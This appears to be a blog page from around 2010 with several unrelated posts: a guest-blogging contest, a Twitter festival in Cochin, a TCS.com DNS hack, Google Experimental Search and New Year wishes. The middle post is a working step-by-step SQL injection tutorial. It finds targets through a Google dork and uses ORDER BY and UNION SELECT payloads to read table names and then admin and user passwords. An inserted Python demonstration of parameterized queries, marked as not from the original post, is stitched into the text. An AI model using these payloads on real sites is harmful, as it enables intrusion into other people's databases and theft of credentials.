Get extra $s from BlogEngage in this expensive romantic month
It’s February, the month of romance. It’s the shortest month of the year, and yet you end up spending the most. Yes, everyone wishes to make their valentine happy this month, and no one wants money to get in the way of seeing their lover smile. Well, then hurry up. BlogEngage is running a $500 USD guest-blogging contest. Just scribble out something on blogging with a true intention to enjoy the fun of a contest. I am sure you will end up writing a beautiful post. Still not ready to participate? Don’t just let the opportunity slip. BlogEngage is a big platform for bloggers, so I am sure all participants will see the feast.
So let’s meet the stunning sponsors who made this contest possible:
The Current Best of the Guest Blogger Sponsors
SEO and SEM services
Wholesale Greenhouse Supplies
Hydroponics Equipment
Greenhouse Equipment
Greenhouses
Garden Gifts
Gardening Articles
SEO Agency UK
Deal of the day
Last, but not least: yes, I know you people have guessed it. I am participating in this stunning contest. You can find my post here.
Cochin Twestival 2010
Cochin Twestival 2010 will be held on March 25th, 2010 from 5 PM to 8 PM at Somewhere Else Cafe. Cochin Twestival is a mega tweet-up with lots of things added.
RSVP for Cochin Twestival
Hearing the word ‘Twestival’ for the first time?
It is a mega tweet-up with lots of things added. In short, it is a Twitter Festival. Twitter Festivals or Twestivals happen all around the globe once a year. There are basically two types of Twestivals: Twestival Global & Twestival Local. Twestival Global is one day, one cause all around the world and Twestival Local takes place over a weekend where cities are encouraged to support a local cause. Both versions have international momentum, but the real power of Twestival is when everything comes together on one day, giving focus to an important cause, the cause being different every year.
Venue
Twestival Cochin 2010 will be held at Somewhere Else Cafe. A map to the location is available at Twitter Kerala
Registration
You can register for the event on the Facebook Event Page.
How to perform a SQL injection?
First of all, we must know what a ‘SQL injection’ is. Here is the Wikipedia definition: ‘SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application’. Here we will confine ourselves to SQL injections in web sites.
Now we need to find out a site link which is likely to be vulnerable and most probably it will be of the form ‘ http://www.site.com/abc.php?id=5 ‘. If you haven’t got such a link, just do a search in Google for ‘allinurl:.php?*id’ and take out a result.
1. Check the vulnerability by adding ' to the above link.
If you get an error message it means that the site is vulnerable to SQL injection.
Now you can be damn sure that the site is vulnerable to SQL injection.
2. Find out the number of columns
To find the number of columns, we use the ORDER BY statement.
Just increment the number until we get an error.
http://www.site.com/abc.php?id=5 order by 1-- <-- no error
http://www.site.com/abc.php?id=5 order by 2-- <-- no error
http://www.site.com/abc.php?id=5 order by 3-- <-- no error
http://www.site.com/abc.php?id=5 order by 4-- <-- ERROR (we get some message like Unknown column ‘4’)
So we can conclude that the table has 4 columns
3. Check whether UNION function works or not
http://www.site.com/abc.php?id=5 union all select 1,2,3--
We will get a number on the screen. Let’s say we get the number 2 at this step.
4. Check for MySQL version by replacing 2 in the above step by version()
http://www.site.com/abc.php?id=5 union all select 1,version(),3--
Now you can find the version from the site, and only if it is found to be above 5 can we continue to the next steps.
// If the version is lower than 5, then we will have to adopt some other methods, which I will explain in a future post //
5. Use information_schema
Why do we use information_schema? The reason is very simple: ‘In MySQL 5 and higher versions, information_schema holds all tables and columns in the database’.
To get tables we use table_name and information_schema.tables
http://www.site.com/abc.php?id=5 union all select 1,table_name,3 from information_schema.tables--
6. Now that we have the column and table names, just retrieve the sensitive data like admin, user, passwords, etc.
//PLEASE DON’T USE THE INFORMATION PROVIDED IN THIS POST FOR CRACKING PURPOSES
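The probes in the steps above only work when the id parameter is concatenated into the SQL text. The following is an added example, not code from the original post: it uses Python's sqlite3 as an offline stand-in for the PHP/MySQL site, and the articles table (three columns, constructed data) and all function names are assumptions made for illustration. It runs the same parameter values against a concatenated query and against a validated, parameterized one.

```python
import sqlite3

# Parameter values taken from the steps above (only the value of id).
PROBES = ["5", "5'", "5 order by 3--", "5 order by 4--", "5 union all select 1,2,3--"]

def make_db():
    """In-memory stand-in for the site's database (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.execute("INSERT INTO articles VALUES (5, 'Hello', 'First post')")
    return db

def lookup_vulnerable(db, raw_id):
    # 'Before' pattern: the parameter is concatenated into the SQL text, so
    # everything after the number is parsed as SQL.
    sql = "SELECT id, title, body FROM articles WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def lookup_hardened(db, raw_id):
    # Reject anything that is not a plain integer, then bind it as a parameter
    # so the value can never alter the structure of the statement.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be an integer")
    sql = "SELECT id, title, body FROM articles WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

def outcome(lookup, db, raw_id):
    """Classify what a request would observe: row count, SQL error, or rejection."""
    try:
        return "rows=%d" % len(lookup(db, raw_id))
    except sqlite3.Error:
        return "sql-error"   # a database error reaching the page is the signal steps 1 and 2 rely on
    except ValueError:
        return "rejected"    # generic failure response, no database detail exposed

def compare():
    """Map each probe to (vulnerable outcome, hardened outcome)."""
    db = make_db()
    return {p: (outcome(lookup_vulnerable, db, p), outcome(lookup_hardened, db, p))
            for p in PROBES}

if __name__ == "__main__":
    for probe, (before, after) in compare().items():
        print("%-30r vulnerable: %-10s hardened: %s" % (probe, before, after))
```

Only the legitimate value 5 returns a row from the hardened lookup; every probe is rejected before it reaches the database, so no error text or extra row is available to the requester.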
TCS.com hack exposes difference between Google public DNS and open DNS services
TCS.com, belonging to Tata Consultancy Services, was hacked earlier today, and it is claimed to be an attack over a DNS loophole.
Using nslookup, the difference between Google public DNS and OpenDNS was studied.
On using nslookup for OpenDNS, the results for both tcs.com and http://www.tcs.com were the same.
On using nslookup for Google public DNS, the results for tcs.com and http://www.tcs.com were different.
For http://www.tcs.com the address was 205.178.152.154, while for tcs.com it was 216.15.200.140.
Thanks to Albins for pointing out the difference.
Official site of Tata Consultancy Services gets hacked by a French cracker
The website http://www.tcs.com, which belongs to India’s IT giant Tata Consultancy Services, has been hacked by a French hacker. As I write this post, the TCS group has still not resolved the problem. It’s more likely that it is not a web software hack, but an attack through a DNS loophole.
If you visit TCS.com you will see a page like the screenshot below, saying that they have put up the domain name for sale.
Try out Google Experimental Search
‘Google Experimental Search’! Hearing of it for the first time? It is another cool Google feature, launched in May 2007. Many believed that it was going to redefine the present search engines. Basically, it has three provisions:
- Google Social Search
- Keyboard Shortcuts
- Accessible View
You can try it at http://www.google.com/experimental/
Happy New Year to all Readers
It’s 6 PM on January 1st, 2010. Yes, I have been late in wishing you guys a Happy New Year. I take this opportunity to thank all our elite readers for your support during the year 2009, and I wish you all a very HAPPY NEW YEAR.